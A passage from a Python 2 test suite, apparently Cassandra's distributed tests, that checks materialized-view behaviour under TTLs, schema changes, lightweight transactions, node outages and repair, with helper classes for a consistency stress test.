"Secondary indexes are not supported on materialized views")
    def ttl_test(self):
        """
        Test that TTL works as expected for a materialized view
        @expected_result The TTL is propagated properly between tables.
        """
        session = self.prepare()
        session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 int, v3 int)")
        session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
                         "WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))

        # every row is written with a 10 second TTL
        for i in xrange(100):
            session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, {v}, {v}) USING TTL 10".format(v=i))

        # before expiry each row must be visible in the view
        for i in xrange(100):
            assert_one(session, "SELECT * FROM t_by_v2 WHERE v2 = {}".format(i), [i, i, i, i])

        # sleep past the 10s TTL (with margin); view rows must expire too
        time.sleep(20)

        rows = list(session.execute("SELECT * FROM t_by_v2"))
        self.assertEqual(len(rows), 0, "Expected 0 rows but got {}".format(len(rows)))
def query_all_new_column_test(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when adding a new column
@expected_result The new column is present in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'"))
self.assertEqual(len(results), 1)
self.assertTrue(hasattr(results[0], 'first_name'), 'Column "first_name" not found')
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, None, 'f', 'ch@ngem3a', None]
)
def query_new_column_test(self):
"""
Test that a materialized view created with 'SELECT <col1, ...>' works as expected when adding a new column
@expected_result The new column is not present in the view.
"""
session = self.prepare(user_table=True)
session.execute(("CREATE MATERIALIZED VIEW users_by_state2 AS SELECT username FROM users "
"WHERE STATE IS NOT NULL AND USERNAME IS NOT NULL PRIMARY KEY (state, username)"))
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'"))
self.assertEqual(len(results), 1)
self.assertFalse(hasattr(results[0], 'first_name'), 'Column "first_name" found in view')
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
    def lwt_test(self):
        """Test that lightweight transaction behave properly with a materialized view"""
        session = self.prepare()
        session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
        session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

        debug("Inserting initial data using IF NOT EXISTS")
        for i in xrange(1000):
            session.execute(
                "INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
            )
        # MV updates go through the batchlog; replay before reading the view
        self._replay_batchlogs()

        debug("All rows should have been inserted")
        for i in xrange(1000):
            assert_one(
                session,
                "SELECT * FROM t_by_v WHERE v = {}".format(i),
                [i, i, 'a', 3.0]
            )

        debug("Tyring to UpInsert data with a different value using IF NOT EXISTS")
        # every row already exists, so all these conditional inserts no-op
        for i in xrange(1000):
            v = i * 2
            session.execute(
                "INSERT INTO t (id, v, v2, v3) VALUES ({id}, {v}, 'a', 3.0) IF NOT EXISTS".format(id=i, v=v)
            )
        self._replay_batchlogs()

        debug("No rows should have changed")
        for i in xrange(1000):
            assert_one(
                session,
                "SELECT * FROM t_by_v WHERE v = {}".format(i),
                [i, i, 'a', 3.0]
            )

        debug("Update the 10 first rows with a different value")
        # loop covers all 1000 rows, but IF v < 10 only holds for ids 0..9
        for i in xrange(1000):
            v = i + 2000
            session.execute(
                "UPDATE t SET v={v} WHERE id = {id} IF v < 10".format(id=i, v=v)
            )
        self._replay_batchlogs()

        debug("Verify that only the 10 first rows changed.")
        results = list(session.execute("SELECT * FROM t_by_v;"))
        self.assertEqual(len(results), 1000)
        for i in xrange(1000):
            v = i + 2000 if i < 10 else i
            assert_one(
                session,
                "SELECT * FROM t_by_v WHERE v = {}".format(v),
                [v, i, 'a', 3.0]
            )

        debug("Deleting the first 10 rows")
        # IF v = {v} only matches the ten rows updated above (v = id + 2000)
        for i in xrange(1000):
            v = i + 2000
            session.execute(
                "DELETE FROM t WHERE id = {id} IF v = {v} ".format(id=i, v=v)
            )
        self._replay_batchlogs()

        debug("Verify that only the 10 first rows have been deleted.")
        results = list(session.execute("SELECT * FROM t_by_v;"))
        self.assertEqual(len(results), 990)
        for i in xrange(10, 1000):
            assert_one(
                session,
                "SELECT * FROM t_by_v WHERE v = {}".format(i),
                [i, i, 'a', 3.0]
            )
    def interrupt_build_process_test(self):
        """Test that an interrupted MV build process is resumed as it should"""
        session = self.prepare(options={'hinted_handoff_enabled': False})
        node1, node2, node3 = self.cluster.nodelist()

        session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")

        debug("Inserting initial data")
        for i in xrange(10000):
            session.execute(
                "INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
            )

        debug("Create a MV")
        session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

        debug("Stop the cluster. Interrupt the MV build process.")
        self.cluster.stop()

        debug("Restart the cluster")
        self.cluster.start(wait_for_binary_proto=True)
        session = self.patient_cql_connection(node1)
        session.execute("USE ks")

        debug("MV shouldn't be built yet.")
        # only ids 0..9999 were inserted, so v=10000 can never match
        assert_none(session, "SELECT * FROM t_by_v WHERE v=10000;")

        debug("Wait and ensure the MV build resumed. Waiting up to 2 minutes.")
        start = time.time()
        while True:
            try:
                result = list(session.execute("SELECT count(*) FROM t_by_v;"))
                # an AssertionError here means the count reached 10000,
                # i.e. the resumed build has completed
                self.assertNotEqual(result[0].count, 10000)
            except AssertionError:
                debug("MV build process is finished")
                break

            elapsed = (time.time() - start) / 60
            if elapsed > 2:
                break

            time.sleep(5)

        debug("Verify all data")
        result = list(session.execute("SELECT count(*) FROM t_by_v;"))
        self.assertEqual(result[0].count, 10000)
        for i in xrange(10000):
            assert_one(
                session,
                "SELECT * FROM t_by_v WHERE v = {}".format(i),
                [i, i, 'a', 3.0],
                cl=ConsistencyLevel.ALL
            )
    def view_tombstone_test(self):
        """
        Test that materialized views are properly tombstoned when the base
        row's view key changes, and that read repair fixes a stale view row.
        @jira_ticket CASSANDRA-10261
        @jira_ticket CASSANDRA-10910
        """
        self.prepare(rf=3, options={'hinted_handoff_enabled': False})
        node1, node2, node3 = self.cluster.nodelist()
        session = self.patient_exclusive_cql_connection(node1)
        session.max_trace_wait = 120
        session.execute('USE ks')
        session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
        session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
        session.cluster.control_connection.wait_for_schema_agreement()
        # Set initial values TS=0, verify
        session.execute(SimpleStatement("INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 0",
                                        consistency_level=ConsistencyLevel.ALL))
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = 1",
            [1, 1, 'a', 3.0]
        )
        # Overwrite only v2 at TS=1; the view row for v=1 must reflect it.
        session.execute(SimpleStatement("INSERT INTO t (id, v2) VALUES (1, 'b') USING TIMESTAMP 1",
                                        consistency_level=ConsistencyLevel.ALL))
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = 1",
            [1, 1, 'b', 3.0]
        )
        # change v's value and TS=3, tombstones v=1 and adds v=0 record
        session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 3 SET v = 0 WHERE id = 1",
                                        consistency_level=ConsistencyLevel.ALL))
        assert_none(session, "SELECT * FROM t_by_v WHERE v = 1")
        debug('Shutdown node2')
        node2.stop(wait_other_notice=True)
        # Flip v back to 1 while node2 is down (no hints), so node2 keeps a
        # stale view tombstone for v=1.
        session.execute("UPDATE t USING TIMESTAMP 4 SET v = 1 WHERE id = 1")
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = 1",
            [1, 1, 'b', 3.0]
        )
        node2.start(wait_other_notice=True, wait_for_binary_proto=True)
        # We should get a digest mismatch
        query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1",
                                consistency_level=ConsistencyLevel.ALL)
        result = session.execute(query, trace=True)
        self.check_trace_events(result.get_query_trace(), True)
        # We should not get a digest mismatch the second time
        query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1", consistency_level=ConsistencyLevel.ALL)
        result = session.execute(query, trace=True)
        self.check_trace_events(result.get_query_trace(), False)
        # Verify values one last time
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = 1",
            [1, 1, 'b', 3.0],
            cl=ConsistencyLevel.ALL
        )
def check_trace_events(self, trace, expect_digest):
# we should see multiple requests get enqueued prior to index scan
# execution happening
# Look for messages like:
# Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey
regex = r"Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey"
for event in trace.events:
desc = event.description
match = re.match(regex, desc)
if match:
if expect_digest:
break
else:
self.fail("Encountered digest mismatch when we shouldn't")
else:
if expect_digest:
self.fail("Didn't find digest mismatch")
    def simple_repair_test(self):
        """
        Test that a materialized view is consistent after a simple repair:
        write 1000 rows while one replica is down (hints disabled), verify the
        view is readable at CL=ONE but not CL=ALL, then repair and re-verify.
        """
        session = self.prepare(rf=3, options={'hinted_handoff_enabled': False})
        node1, node2, node3 = self.cluster.nodelist()
        session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
        session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
        session.cluster.control_connection.wait_for_schema_agreement()
        debug('Shutdown node2')
        node2.stop(wait_other_notice=True)
        # With hinted handoff disabled, node2 permanently misses these writes
        # until repair runs.
        for i in xrange(1000):
            session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
        self._replay_batchlogs()
        debug('Verify the data in the MV with CL=ONE')
        for i in xrange(1000):
            assert_one(
                session,
                "SELECT * FROM t_by_v WHERE v = {}".format(i),
                [i, i, 'a', 3.0]
            )
        debug('Verify the data in the MV with CL=ALL. All should be unavailable.')
        for i in xrange(1000):
            statement = SimpleStatement(
                "SELECT * FROM t_by_v WHERE v = {}".format(i),
                consistency_level=ConsistencyLevel.ALL
            )
            assert_unavailable(
                session.execute,
                statement
            )
        debug('Start node2, and repair')
        node2.start(wait_other_notice=True, wait_for_binary_proto=True)
        node1.repair()
        debug('Verify the data in the MV with CL=ONE. All should be available now.')
        for i in xrange(1000):
            assert_one(
                session,
                "SELECT * FROM t_by_v WHERE v = {}".format(i),
                [i, i, 'a', 3.0],
                cl=ConsistencyLevel.ONE
            )
    def base_replica_repair_test(self):
        """
        Test that a materialized view is consistent after repairing only the
        base replica: wipe node1's data entirely, then `nodetool repair ks t`
        on the base table and verify the view was rebuilt too.
        """
        self.prepare(rf=3)
        node1, node2, node3 = self.cluster.nodelist()
        session = self.patient_exclusive_cql_connection(node1)
        session.execute('USE ks')
        session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
        session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
        session.cluster.control_connection.wait_for_schema_agreement()
        debug('Write initial data')
        for i in xrange(1000):
            session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
        self._replay_batchlogs()
        debug('Verify the data in the MV with CL=ALL')
        for i in xrange(1000):
            assert_one(
                session,
                "SELECT * FROM t_by_v WHERE v = {}".format(i),
                [i, i, 'a', 3.0],
                cl=ConsistencyLevel.ALL
            )
        debug('Shutdown node1')
        node1.stop(wait_other_notice=True)
        debug('Delete node1 data')
        node1.clear(clear_all=True)
        debug('Restarting node1')
        node1.start(wait_other_notice=True, wait_for_binary_proto=True)
        # Isolate node1 so reads below can only be served from its (empty)
        # local data.
        debug('Shutdown node2 and node3')
        node2.stop(wait_other_notice=True)
        node3.stop(wait_other_notice=True)
        session = self.patient_exclusive_cql_connection(node1)
        session.execute('USE ks')
        debug('Verify that there is no data on node1')
        for i in xrange(1000):
            assert_none(
                session,
                "SELECT * FROM t_by_v WHERE v = {}".format(i)
            )
        debug('Restarting node2 and node3')
        node2.start(wait_other_notice=True, wait_for_binary_proto=True)
        node3.start(wait_other_notice=True, wait_for_binary_proto=True)
        # Just repair the base replica
        node1.nodetool("repair ks t")
        debug('Verify data with cl=ALL')
        for i in xrange(1000):
            assert_one(
                session,
                "SELECT * FROM t_by_v WHERE v = {}".format(i),
                [i, i, 'a', 3.0]
            )
    def complex_repair_test(self):
        """
        Test that a materialized view is consistent after a more complex
        repair: two disjoint replica groups receive conflicting writes while
        the other group is down; after batchlogs expire and a global repair,
        the newer data must win at QUORUM.
        """
        session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
        node1, node2, node3, node4, node5 = self.cluster.nodelist()
        # we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
        session.execute("CREATE TABLE ks.t (id int PRIMARY KEY, v int, v2 text, v3 decimal)"
                        "WITH gc_grace_seconds = 5")
        session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
        session.cluster.control_connection.wait_for_schema_agreement()
        debug('Shutdown node2 and node3')
        node2.stop()
        node3.stop(wait_other_notice=True)
        debug('Write initial data to node1 (will be replicated to node4 and node5)')
        for i in xrange(1000):
            session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
        debug('Verify the data in the MV on node1 with CL=ONE')
        for i in xrange(1000):
            assert_one(
                session,
                "SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
                [i, i, 'a', 3.0]
            )
        debug('Shutdown node1, node4 and node5')
        node1.stop()
        node4.stop()
        node5.stop()
        debug('Start nodes 2 and 3')
        node2.start()
        node3.start(wait_other_notice=True, wait_for_binary_proto=True)
        session2 = self.patient_cql_connection(node2)
        debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
        for i in xrange(1000):
            assert_none(
                session2,
                "SELECT * FROM ks.t_by_v WHERE v = {}".format(i)
            )
        debug('Write new data in node2 and node3 that overlap those in node1, node4 and node5')
        for i in xrange(1000):
            # we write i*2 as value, instead of i
            session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i * 2))
        debug('Verify the new data in the MV on node2 with CL=ONE')
        for i in xrange(1000):
            v = i * 2
            assert_one(
                session2,
                "SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
                [v, v, 'a', 3.0]
            )
        debug('Wait for batchlogs to expire from node2 and node3')
        time.sleep(5)
        debug('Start remaining nodes')
        node1.start(wait_other_notice=True, wait_for_binary_proto=True)
        node4.start(wait_other_notice=True, wait_for_binary_proto=True)
        node5.start(wait_other_notice=True, wait_for_binary_proto=True)
        session = self.patient_cql_connection(node1)
        debug('Read data from MV at QUORUM (old data should be returned)')
        for i in xrange(1000):
            assert_one(
                session,
                "SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
                [i, i, 'a', 3.0],
                cl=ConsistencyLevel.QUORUM
            )
        debug('Run global repair on node1')
        node1.repair()
        debug('Read data from MV at quorum (new data should be returned after repair)')
        for i in xrange(1000):
            v = i * 2
            assert_one(
                session,
                "SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
                [v, v, 'a', 3.0],
                cl=ConsistencyLevel.QUORUM
            )
    def really_complex_repair_test(self):
        """
        Test that a materialized view is consistent after a more complex
        repair involving a compound primary key and row deletions issued on
        a partitioned replica group.
        """
        session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
        node1, node2, node3, node4, node5 = self.cluster.nodelist()
        # we create the base table with gc_grace_seconds=1 so batchlog will expire quickly
        session.execute("CREATE TABLE ks.t (id int, v int, v2 text, v3 decimal, PRIMARY KEY(id, v, v2))"
                        "WITH gc_grace_seconds = 1")
        # NOTE(review): 'v IS NOT NULL' appears twice in the WHERE clause below;
        # redundant but harmless.
        session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL AND v IS NOT NULL AND "
                         "v2 IS NOT NULL PRIMARY KEY (v2, v, id)"))
        session.cluster.control_connection.wait_for_schema_agreement()
        debug('Shutdown node2 and node3')
        node2.stop(wait_other_notice=True)
        node3.stop(wait_other_notice=True)
        session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0)")
        session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'a', 3.0)")
        self._replay_batchlogs()
        debug('Verify the data in the MV on node1 with CL=ONE')
        assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]])
        session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'b', 3.0)")
        session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'b', 3.0)")
        self._replay_batchlogs()
        debug('Verify the data in the MV on node1 with CL=ONE')
        assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'b'", [['b', 1, 1, 3.0], ['b', 2, 2, 3.0]])
        session.shutdown()
        debug('Shutdown node1, node4 and node5')
        node1.stop()
        node4.stop()
        node5.stop()
        debug('Start nodes 2 and 3')
        node2.start()
        node3.start(wait_other_notice=True, wait_for_binary_proto=True)
        session2 = self.patient_cql_connection(node2)
        session2.execute('USE ks')
        debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
        assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'")
        debug('Write new data in node2 that overlap those in node1')
        session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'c', 3.0)")
        session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'c', 3.0)")
        self._replay_batchlogs()
        assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'", [['c', 1, 1, 3.0], ['c', 2, 2, 3.0]])
        session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'd', 3.0)")
        session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'd', 3.0)")
        self._replay_batchlogs()
        assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'", [['d', 1, 1, 3.0], ['d', 2, 2, 3.0]])
        debug("Composite delete of everything")
        session2.execute("DELETE FROM ks.t WHERE id = 1 and v = 1")
        session2.execute("DELETE FROM ks.t WHERE id = 2 and v = 2")
        self._replay_batchlogs()
        assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'")
        assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'")
        debug('Wait for batchlogs to expire from node2 and node3')
        time.sleep(5)
        debug('Start remaining nodes')
        node1.start(wait_other_notice=True, wait_for_binary_proto=True)
        node4.start(wait_other_notice=True, wait_for_binary_proto=True)
        node5.start(wait_other_notice=True, wait_for_binary_proto=True)
        # at this point the data isn't repaired so we have an inconsistency.
        # this value should return None
        assert_all(
            session2,
            "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]],
            cl=ConsistencyLevel.QUORUM
        )
        debug('Run global repair on node1')
        node1.repair()
        assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", cl=ConsistencyLevel.QUORUM)
    def complex_mv_select_statements_test(self):
        """
        Test complex MV select statements: for each of several MV primary-key
        arrangements, exercise inserts/updates/deletes that both match and
        miss the view's filter (a = 1 AND c = 1) and verify the view contents.
        @jira_ticket CASSANDRA-9664
        """
        cluster = self.cluster
        cluster.populate(3).start()
        node1 = cluster.nodelist()[0]
        session = self.patient_cql_connection(node1)
        debug("Creating keyspace")
        session.execute("CREATE KEYSPACE mvtest WITH replication = "
                        "{'class': 'SimpleStrategy', 'replication_factor': '3'}")
        session.execute('USE mvtest')
        # Every legal rearrangement of (a, b, c) as the MV primary key.
        mv_primary_keys = ["((a, b), c)",
                           "((b, a), c)",
                           "(a, b, c)",
                           "(c, b, a)",
                           "((c, a), b)"]
        for mv_primary_key in mv_primary_keys:
            session.execute("CREATE TABLE test (a int, b int, c int, d int, PRIMARY KEY (a, b, c))")
            insert_stmt = session.prepare("INSERT INTO test (a, b, c, d) VALUES (?, ?, ?, ?)")
            update_stmt = session.prepare("UPDATE test SET d = ? WHERE a = ? AND b = ? AND c = ?")
            delete_stmt1 = session.prepare("DELETE FROM test WHERE a = ? AND b = ? AND c = ?")
            delete_stmt2 = session.prepare("DELETE FROM test WHERE a = ?")
            session.cluster.control_connection.wait_for_schema_agreement()
            # Seed rows; only those with a=1 and c=1 can appear in the view.
            rows = [(0, 0, 0, 0),
                    (0, 0, 1, 0),
                    (0, 1, 0, 0),
                    (0, 1, 1, 0),
                    (1, 0, 0, 0),
                    (1, 0, 1, 0),
                    (1, 1, -1, 0),
                    (1, 1, 0, 0),
                    (1, 1, 1, 0)]
            for row in rows:
                session.execute(insert_stmt, row)
            debug("Testing MV primary key: {}".format(mv_primary_key))
            session.execute("CREATE MATERIALIZED VIEW mv AS SELECT * FROM test WHERE "
                            "a = 1 AND b IS NOT NULL AND c = 1 PRIMARY KEY {}".format(mv_primary_key))
            time.sleep(3)
            assert_all(
                session, "SELECT a, b, c, d FROM mv",
                [[1, 0, 1, 0], [1, 1, 1, 0]],
                ignore_order=True,
                cl=ConsistencyLevel.QUORUM
            )
            # insert new rows that does not match the filter
            session.execute(insert_stmt, (0, 0, 1, 0))
            session.execute(insert_stmt, (1, 1, 0, 0))
            assert_all(
                session, "SELECT a, b, c, d FROM mv",
                [[1, 0, 1, 0], [1, 1, 1, 0]],
                ignore_order=True,
                cl=ConsistencyLevel.QUORUM
            )
            # insert new row that does match the filter
            session.execute(insert_stmt, (1, 2, 1, 0))
            assert_all(
                session, "SELECT a, b, c, d FROM mv",
                [[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
                ignore_order=True,
                cl=ConsistencyLevel.QUORUM
            )
            # update rows that does not match the filter
            session.execute(update_stmt, (1, 1, -1, 0))
            session.execute(update_stmt, (0, 1, 1, 0))
            assert_all(
                session, "SELECT a, b, c, d FROM mv",
                [[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
                ignore_order=True,
                cl=ConsistencyLevel.QUORUM
            )
            # update a row that does match the filter
            session.execute(update_stmt, (2, 1, 1, 1))
            assert_all(
                session, "SELECT a, b, c, d FROM mv",
                [[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
                ignore_order=True,
                cl=ConsistencyLevel.QUORUM
            )
            # delete rows that does not match the filter
            session.execute(delete_stmt1, (1, 1, -1))
            session.execute(delete_stmt1, (2, 0, 1))
            session.execute(delete_stmt2, (0,))
            assert_all(
                session, "SELECT a, b, c, d FROM mv",
                [[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
                ignore_order=True,
                cl=ConsistencyLevel.QUORUM
            )
            # delete a row that does match the filter
            session.execute(delete_stmt1, (1, 1, 1))
            assert_all(
                session, "SELECT a, b, c, d FROM mv",
                [[1, 0, 1, 0], [1, 2, 1, 0]],
                ignore_order=True,
                cl=ConsistencyLevel.QUORUM
            )
            # delete a partition that matches the filter
            session.execute(delete_stmt2, (1,))
            assert_all(session, "SELECT a, b, c, d FROM mv", [], cl=ConsistencyLevel.QUORUM)
            # Cleanup
            session.execute("DROP MATERIALIZED VIEW mv")
            session.execute("DROP TABLE test")
# For read verification
class MutationPresence(Enum):
    # Classification of a single read-verification result.
    match = 1      # row present with the expected value
    extra = 2      # row present but with an unexpected value
    missing = 3    # row expected but absent from the view
    excluded = 4   # row neither expected nor present
    unknown = 5    # any other combination (should not happen)
class MM(object):
    """Base class for read-verification results ("MutationPresence marker")."""

    # The MutationPresence category; set by subclasses.
    mp = None

    def out(self):
        """Return a human-readable report line, or None if nothing to report."""
        pass
class Match(MM):
    """Read result matched the expected row; nothing to report."""

    def __init__(self):
        self.mp = MutationPresence.match

    def out(self):
        return None
class Extra(MM):
    """Read returned a row, but with a value other than the expected one."""

    expecting = None  # value the verifier expected
    value = None      # value actually used to query
    row = None        # the (a, b, c, d) tuple that came back

    def __init__(self, expecting, value, row):
        self.mp = MutationPresence.extra
        self.expecting = expecting
        self.value = value
        self.row = row

    def out(self):
        return "Extra. Expected {} instead of {}; row: {}".format(self.expecting, self.value, self.row)
class Missing(MM):
    """An expected row was absent from the view."""

    value = None  # expected base value
    row = None    # sequence number of the missing row

    def __init__(self, value, row):
        self.mp = MutationPresence.missing
        self.value = value
        self.row = row

    def out(self):
        return "Missing. At {}".format(self.row)
class Excluded(MM):
    """Row was neither expected nor returned; nothing to report."""

    def __init__(self):
        self.mp = MutationPresence.excluded

    def out(self):
        return None
class Unknown(MM):
    """Unclassifiable result (should not occur); nothing to report."""

    def __init__(self):
        self.mp = MutationPresence.unknown

    def out(self):
        return None
# Consistency levels used by the consistency stress tests below.
readConsistency = ConsistencyLevel.QUORUM
writeConsistency = ConsistencyLevel.QUORUM
# One row of the mvtest.test1 base table: (a, b) is the primary key.
SimpleRow = collections.namedtuple('SimpleRow', 'a b c d')
def row_generate(i, num_partitions):
    """Deterministically map sequence number `i` onto a SimpleRow.

    `a` spreads rows across `num_partitions` partitions; `b` buckets them
    (integer division under Python 2); `c` and `d` carry `i` itself.
    """
    partition = i % num_partitions
    bucket = (i % 400) / num_partitions
    return SimpleRow(a=partition, b=bucket, c=i, d=i)
# Create a threaded session and execute queries from a Queue
# Create a threaded session and execute queries from a Queue
def thread_session(ip, queue, start, end, rows, num_partitions):
    """Worker-process entry point: verify rows [start, end) through the MV.

    Connects to the node at `ip`, reads each generated row back from
    mvtest.mv1 and pushes a MutationPresence marker (Match/Extra/Missing/
    Excluded/Unknown) onto `queue` for the parent to tally.
    `rows` maps (a, b) -> expected c, as captured by _populate_rows.
    """

    def execute_query(session, select_gi, i):
        # Classify the view read for sequence number i.
        row = row_generate(i, num_partitions)
        if (row.a, row.b) in rows:
            base = rows[(row.a, row.b)]
        else:
            base = -1
        gi = list(session.execute(select_gi, [row.c, row.a]))
        if base == i and len(gi) == 1:
            return Match()
        elif base != i and len(gi) == 1:
            return Extra(base, i, (gi[0][0], gi[0][1], gi[0][2], gi[0][3]))
        elif base == i and len(gi) == 0:
            return Missing(base, i)
        elif base != i and len(gi) == 0:
            return Excluded()
        else:
            return Unknown()

    try:
        cluster = Cluster([ip])
        session = cluster.connect()
        select_gi = session.prepare("SELECT * FROM mvtest.mv1 WHERE c = ? AND a = ?")
        select_gi.consistency_level = readConsistency
        for i in range(start, end):
            ret = execute_query(session, select_gi, i)
            queue.put_nowait(ret)
    except Exception as e:
        # Best-effort: report and close the queue so the parent doesn't hang.
        print str(e)
        queue.close()
@since('3.0')
@skipIf(sys.platform == 'win32', 'Bug in python on Windows: https://bugs.python.org/issue10128')
class TestMaterializedViewsConsistency(Tester):
def prepare(self, user_table=False):
cluster = self.cluster
cluster.populate(3).start()
node2 = cluster.nodelist()[1]
# Keep the status of async requests
self.exception_type = collections.Counter()
self.num_request_done = 0
self.counts = {}
for mp in MutationPresence:
self.counts[mp] = 0
self.rows = {}
self.update_stats_every = 100
debug("Set to talk to node 2")
self.session = self.patient_cql_connection(node2)
return self.session
def _print_write_status(self, row):
output = "\r{}".format(row)
for key in self.exception_type.keys():
output = "{} ({}: {})".format(output, key, self.exception_type[key])
sys.stdout.write(output)
sys.stdout.flush()
def _print_read_status(self, row):
if self.counts[MutationPresence.unknown] == 0:
sys.stdout.write(
"\rOn {}; match: {}; extra: {}; missing: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing])
)
else:
sys.stdout.write(
"\rOn {}; match: {}; extra: {}; missing: {}; WTF: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing],
self.counts[MutationPresence.unkown])
)
sys.stdout.flush()
def _do_row(self, insert_stmt, i, num_partitions):
# Error callback for async requests
def handle_errors(row, exc):
self.num_request_done += 1
try:
name = type(exc).__name__
self.exception_type[name] += 1
except Exception as e:
print traceback.format_exception_only(type(e), e)
# Success callback for async requests
def success_callback(row):
self.num_request_done += 1
if i % self.update_stats_every == 0:
self._print_write_status(i)
row = row_generate(i, num_partitions)
async = self.session.execute_async(insert_stmt, row)
errors = partial(handle_errors, row)
async.add_callbacks(success_callback, errors)
def _populate_rows(self):
statement = SimpleStatement(
"SELECT a, b, c FROM mvtest.test1",
consistency_level=readConsistency
)
data = self.session.execute(statement)
for row in data:
self.rows[(row.a, row.b)] = row.c
